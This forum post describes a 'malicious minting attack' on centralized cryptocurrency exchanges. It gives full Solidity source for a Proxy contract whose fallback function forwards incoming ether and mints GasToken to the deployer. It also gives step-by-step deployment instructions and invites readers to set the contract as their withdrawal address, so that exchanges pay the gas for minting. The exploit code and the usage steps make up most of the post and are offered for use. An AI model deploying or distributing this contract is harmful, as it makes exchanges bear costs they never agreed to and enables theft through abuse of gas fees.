Make centralized exchanges mine GasToken for you


#1

There have been rumours of a malicious mining attack. The organizations that are really affected by it are primarily centralized exchanges (real DEXs are unaffected).

https://www.ccn.com/ethereum-token-hit-by-malicious-minting-attack/

The gist of the so-called attack is that you can create a little smart contract that will mine some GST and send it to your address. Then when you withdraw money from a centralized exchange you provide the address of this smart contract instead of your wallet address. Every time you withdraw money from such an exchange, even 0.0001 ETC (or ETH, works on both networks), they will effectively send you the requested money AND 1 GST of your choice.

The code of the so-called exploit is attached to this post. You can open remix with Saturn Wallet activated, copypaste this code, compile with Solidity 0.4.19 (screenshot attached), click Run, and deploy the Proxy contract. Then use the address of the deployed contract as your receiving address.

I can neither confirm nor deny that this code works, use at your own risk :angel:

pragma solidity ^0.4.19;

contract GST {
  function transfer(address _to, uint256 _value) public returns (bool);
  function mint(uint256 value) public;
}

contract Proxy {
  // GST1
  /* address private gastoken = 0x88d60255F917e3eb94eaE199d827DAd837fac4cB; */
  // GST2
  address private gastoken = 0x0000000000b3F879cb30FE243b4Dfee438691c04;
  uint256 amount = 100; // 1 GST per invocation, feel free to change
  address admin;

  function Proxy() {
    admin = msg.sender;
  }

  function () payable public {
    // forward incoming ether
    admin.transfer(msg.value);
    // mint some gastokens
    GST(gastoken).mint(amount);
    // transfer minted gastoken
    GST(gastoken).transfer(admin, amount);
  }
}